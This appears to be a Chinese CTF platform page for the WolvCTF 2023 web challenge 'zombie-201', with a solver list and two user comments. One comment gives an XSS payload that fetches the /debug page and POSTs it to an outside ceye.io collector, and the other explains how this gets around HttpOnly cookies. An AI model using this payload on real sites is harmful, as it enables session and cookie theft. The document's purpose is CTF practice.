zombie-201WEB 未解决

分数: 0 金币: 0
所属赛事: WolvCTF 2023
题目作者: 未知
一  血: heyile
一血奖励: 0金币
解  决: 52
提  示:
描  述:
wctf{}
评论
vincentshine 6月前

http://82.157.146.43:10973/zombie?show=<script>fetch('http://82.157.146.43:10973/debug').then(data => { fetch('http://xxxx.ceye.io',{method: 'POST', body: data}) })</script>

回复 0

justsosoloveyou 1年前

httponly禁止了js读取cookie,要考虑绕过。由于debug页面的响应包含cookie,那就让后台管理访问debug页面,然后将页面响应回传。要注意js编码和要对页面响应内容编码。

回复 7

WriteUp

image
zzhicecyb

0 金币

评分(0)

暂无评分

解题动态

ting006 攻破了该题 27天前
max333 攻破了该题 1月前
yh1824159516 攻破了该题 1月前
王大炮 攻破了该题 1月前
iictfii 攻破了该题 2月前
A1234467 攻破了该题 2月前
excnir 攻破了该题 2月前
dir_tree 攻破了该题 3月前
Jokerz 攻破了该题 3月前
zzhicecyb 攻破了该题 3月前
blackkkkkk 攻破了该题 3月前
admin6669 攻破了该题 3月前
whileangel 攻破了该题 3月前
ZIO2020 攻破了该题 4月前
sraiL 攻破了该题 5月前
n0th1n9 攻破了该题 5月前
rouzongbaba 攻破了该题 5月前
vnuesa 攻破了该题 6月前
vincentshine 攻破了该题 6月前
krioee 攻破了该题 6月前
问题反馈